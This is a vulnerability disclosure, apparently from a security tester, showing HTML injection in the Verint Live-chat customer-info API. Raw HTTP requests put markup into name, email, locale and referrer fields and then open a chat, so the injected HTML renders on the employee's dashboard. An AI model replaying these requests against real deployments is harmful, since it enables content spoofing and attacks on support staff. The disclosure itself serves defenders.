Verint Live-chat HTML injection

Verint live-chat is an application part of Verint Engagement Management (version 15.3 Update 2023R2) that makes it possible for users on a website to ask questions through a chat box. The questions are answered by an employee via the Verint dashboard.
It is possible to inject HTML code into the "User Data" form in the live-chat.

When we create a new chat an API call is made. In this JSON API call, it is possible to inject HTML code into the following parameters: "customerFirstName", "customerEmail", "customerLocale" and "refererURL".

POST /chat/CONAV/chat/rest/api/clients?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517 HTTP/1.1
Host: apps.x.nl
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://staging.x.nl/
Content-Type: application/json
Content-Length: 234
Origin: https://staging.x.nl
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close

{"customerFirstName":"<h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>",
"customerEmail":"<h1>ee@recoil.nl</h1>",
"customerLocale":"<h1>nl</h1>",
"chatLaunchMode":"CHAT_ONLY",
"refererURL":"<h1>https://recoil.nl<h1>",
"launchCode":"KanaChat",
"launchIdentifier":"KanaChat"}

Take note of the "userId" in the response, we can use this to spawn a chat with the employee.

HTTP/1.1 201 Created
connection: close
content-type: application/hal+json
date: Mon, 08 May 2023 14:44:58 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
access-control-allow-origin: *
access-control-allow-methods: PUT, GET, POST, OPTIONS
access-control-allow-headers: origin, x-requested-with, content-type
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-xss-protection: 0
strict-transport-security: max-age=31536000; includeSubDomains
Set-Cookie: JSESSIONID=Tsf70qRg5layXAoUlwgHYIrAC_3VFCKXjXtfiH1xE-KBpWrqsYyK!896618273; Path=/chat/; Secure; HttpOnly

{"userName":"AAAAAAAAAAAAAAAAAAAAAAAAA",
"userLoginId":"9678-648618303ce0f6327e41ba6a332e392376e615eb048a",
"userId":"vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am","_links":{"self":{"href":"/CONAV/chat/rest/api/clients?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"event":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"queuedstatus":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/queuedstatus?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"logout":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/logout?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"}}}

With the following request we can spawn a chat box.

POST /chat/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517 HTTP/1.1
Host: apps.x.nl
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://staging.x.nl/
Content-Type: application/json
Content-Length: 41
Origin: https://staging.x.nl
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close

[
	{
		"type":"MessageSent",
		"text":"123test"
	}
]

Response:

HTTP/1.1 200 OK
connection: close
content-type: application/hal+json
date: Mon, 08 May 2023 14:45:07 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
access-control-allow-origin: *
access-control-allow-methods: PUT, GET, POST, OPTIONS
access-control-allow-headers: origin, x-requested-with, content-type
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-xss-protection: 0
strict-transport-security: max-age=31536000; includeSubDomains

{"events":[],"_links":{"self":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"nextevent":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"logout":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/logout?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"}}}

By now the employee should get a notification of a new incoming message. When the chat opens the HTML injection takes place. As seen in the red square in the screenshot below.

html-injection.png

When we inspect the source of the webpage we see that it has interpret the HTML code into the website as shown in the screenshot below.

html-injection-source.png